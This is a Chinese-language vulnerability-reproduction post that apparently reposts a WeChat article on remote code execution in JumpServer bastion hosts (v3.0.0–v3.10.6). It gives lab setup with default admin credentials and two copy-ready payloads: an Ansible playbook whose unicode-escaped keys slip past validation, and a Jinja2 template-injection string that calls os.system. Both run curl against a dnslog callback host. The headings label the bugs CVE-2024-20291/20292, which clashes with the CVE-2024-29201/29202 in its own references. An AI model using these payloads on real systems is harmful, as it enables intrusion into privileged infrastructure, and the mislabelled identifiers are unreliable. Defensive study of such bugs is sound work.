本人非原创漏洞作者,文章仅作为知识分享用
一切直接或间接由于本文所造成的后果与本人无关
如有侵权,联系删除
产品简介
Jumpserver 是广受欢迎的开源堡垒机,遵循GPL v3开源许可协议,是符合4A(包含认证Authentication 、授权Authorization、 账号Accounting和审计Auditing)规范的运维安全审计系统。它通过企业版或者软硬件一体机的方式,向企业级用户交付开源增值的运维安全审计解决方案。
开发语言:Python官网地址:https://www.jumpserver.org/
![[漏洞复现] JunmpServer CVE-2024-20291远程命令执行 CVE-2024-20292模板注入](http://cn-sec.com/wp-content/uploads/2024/04/0-1712108953.png "[漏洞复现] JunmpServer CVE-2024-20291远程命令执行 CVE-2024-20292模板注入")
空间测绘
回复“20240403”获取空间测绘语句漏洞描述
CVE-2024-20291
JumpServer是一款开源堡垒主机和运维安全审计系统。攻击者可以绕过 JumpServer 的 Ansible 中的输入验证机制,在 Celery 容器中执行任意代码。
CVE-2024-20292
JumpServer是一款开源堡垒主机和运维安全审计系统。攻击者可以利用 JumpServer 的 Ansible 中的 Jinja2 模板注入漏洞在 Celery 容器中执行任意代码。
影响版本
v3.0.0 ≤ JumpServer ≤ v3.10.6
环境搭建
1.下载安装脚本
curl https://resource.fit2cloud.com/jumpserver/jumpserver/releases/latest/download/quick_start.sh -o install.sh2.修改安装脚本至漏洞版本(这里演示3.10.6)
![[漏洞复现] JunmpServer CVE-2024-20291远程命令执行 CVE-2024-20292模板注入](http://cn-sec.com/wp-content/uploads/2024/04/1-1712108954.png "[漏洞复现] JunmpServer CVE-2024-20291远程命令执行 CVE-2024-20292模板注入")
3.执行安装脚本安装JumpServer
chmod +x install.sh./install.sh
4.登录JumpServer后台(默认账户密码:admin/admin)
5.创建一个普通用户(test_user)
6.创建一个资产(本机Test)
7.资产授权(将“本机Test”授权给test_user)
漏洞利用
1.使用普通用户(test_user)登录JumpServer后台
![[漏洞复现] JunmpServer CVE-2024-20291远程命令执行 CVE-2024-20292模板注入](http://cn-sec.com/wp-content/uploads/2024/04/8-1712108954.png "[漏洞复现] JunmpServer CVE-2024-20291远程命令执行 CVE-2024-20292模板注入")
2.创建新的Playbook(作业中心-模板管理-Playbook管理-创建-创建playbook)
![[漏洞复现] JunmpServer CVE-2024-20291远程命令执行 CVE-2024-20292模板注入](http://cn-sec.com/wp-content/uploads/2024/04/0-1712108955.png "[漏洞复现] JunmpServer CVE-2024-20291远程命令执行 CVE-2024-20292模板注入")
3.点击新创建的playbook名称,点击“工作空间”,输入以下内容,点击保存按钮
CVE-2024-20291
[{"name": "RCE playbook","hosts": "all","tasks": [{"name": "this runs in Celery container","shell": "curl ylxqc8.dnslog.cn","u0064elegate_to": "localhost"} ],"vars": {"ansible_u0063onnection": "local"}}]
![[漏洞复现] JunmpServer CVE-2024-20291远程命令执行 CVE-2024-20292模板注入](http://cn-sec.com/wp-content/uploads/2024/04/2-1712108956.png "[漏洞复现] JunmpServer CVE-2024-20291远程命令执行 CVE-2024-20292模板注入")
CVE-2024-20292
- name: |{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__["__import__"]("os").system("curl ylxqc8.dnslog.cn")}}{%endif%}{%endfor%}
![[漏洞复现] JunmpServer CVE-2024-20291远程命令执行 CVE-2024-20292模板注入](http://cn-sec.com/wp-content/uploads/2024/04/0-1712108957.png "[漏洞复现] JunmpServer CVE-2024-20291远程命令执行 CVE-2024-20292模板注入")
4.创建新的Playbook作业(作业中心-作业管理-创建-Playbook作业)
![[漏洞复现] JunmpServer CVE-2024-20291远程命令执行 CVE-2024-20292模板注入](http://cn-sec.com/wp-content/uploads/2024/04/10-1712108957.png "[漏洞复现] JunmpServer CVE-2024-20291远程命令执行 CVE-2024-20292模板注入")
![[漏洞复现] JunmpServer CVE-2024-20291远程命令执行 CVE-2024-20292模板注入](http://cn-sec.com/wp-content/uploads/2024/04/8-1712108958.png "[漏洞复现] JunmpServer CVE-2024-20291远程命令执行 CVE-2024-20292模板注入")
5.在新创建的Playbook作业项,点击“更多”-“运行”
![[漏洞复现] JunmpServer CVE-2024-20291远程命令执行 CVE-2024-20292模板注入](http://cn-sec.com/wp-content/uploads/2024/04/6-1712108959.png "[漏洞复现] JunmpServer CVE-2024-20291远程命令执行 CVE-2024-20292模板注入")
6.检查DNSlog回显,命令执行成功
![[漏洞复现] JunmpServer CVE-2024-20291远程命令执行 CVE-2024-20292模板注入](http://cn-sec.com/wp-content/uploads/2024/04/10-1712108960.png "[漏洞复现] JunmpServer CVE-2024-20291远程命令执行 CVE-2024-20292模板注入")
参考链接
https://nvd.nist.gov/vuln/detail/CVE-2024-29201https://nvd.nist.gov/vuln/detail/CVE-2024-29202https://github.com/jumpserver/jumpserver/security/advisories/GHSA-pjpp-cm9x-6rwjhttps://github.com/jumpserver/jumpserver/security/advisories/GHSA-2vvr-vmvx-73chhttps://wh0am1i.com/2024/03/30/JumpServer-CVE-2024-29201-CVE-2024-29202/
回复“20240403”获取空间测绘语句
![[漏洞复现] JunmpServer CVE-2024-20291远程命令执行 CVE-2024-20292模板注入](http://cn-sec.com/wp-content/uploads/2024/04/3-1712108960.gif "[漏洞复现] JunmpServer CVE-2024-20291远程命令执行 CVE-2024-20292模板注入")
原文始发于微信公众号(不够安全):[漏洞复现] JunmpServer CVE-2024-20291远程命令执行 CVE-2024-20292模板注入
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论